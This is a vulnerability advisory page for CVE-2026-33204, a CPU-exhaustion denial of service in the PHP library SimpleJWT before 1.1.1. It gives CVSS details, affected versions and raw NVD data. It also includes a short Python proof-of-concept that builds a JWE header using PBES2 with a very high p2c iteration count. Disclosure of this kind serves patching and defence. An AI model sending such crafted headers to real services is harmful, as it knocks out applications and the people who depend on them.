Security Vulnerability Report
中文
CVE-2026-33204 CVSS 7.5 HIGH

CVE-2026-33204

Published: 2026-03-20 23:16:46
Last Modified: 2026-04-10 01:25:08
Source: [email protected]

Description

SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:kelvinmo:simplejwt:*:*:*:*:*:*:*:* - VULNERABLE
SimpleJWT < 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC: Malicious JWE Header Generation # This script demonstrates how to create a JWE header with a high iteration count (p2c) # to trigger the DoS condition in vulnerable SimpleJWT versions. import json import base64 def malicious_jwe_header(): # Define the header with PBES2 algorithm and a very high p2c (iteration count) header = { "alg": "PBES2-HS256+A128KW", "enc": "A128CBC-HS256", "p2c": 10000000 # High iteration count to cause CPU exhaustion } # Encode to Base64URL header_json = json.dumps(header, separators=(',', ':')) header_b64 = base64.urlsafe_b64encode(header_json.encode()).decode().rstrip('=') print(f"Malicious JWE Header: {header_b64}") return header_b64 if __name__ == "__main__": malicious_jwe_header()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33204", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:45.677", "lastModified": "2026-04-10T01:25:08.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1."}, {"lang": "es", "value": "SimpleJWT es una sencilla biblioteca de tokens web JSON escrita en PHP. Antes de la versión 1.1.1, un atacante no autenticado puede realizar una denegación de servicio mediante la manipulación del encabezado JWE cuando se utilizan algoritmos PBES2. Las aplicaciones que llaman a JWE::decrypt() en JWEs controlados por el atacante utilizando algoritmos PBES2 se ven afectadas. Este problema ha sido parcheado en la versión 1.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kelvinmo:simplejwt:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.1", "matchCriteriaId": "FF560E9F-8D50-4B6F-84FF-B63FAB5BD2D0"}]}]}], "references": [{"url": "https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.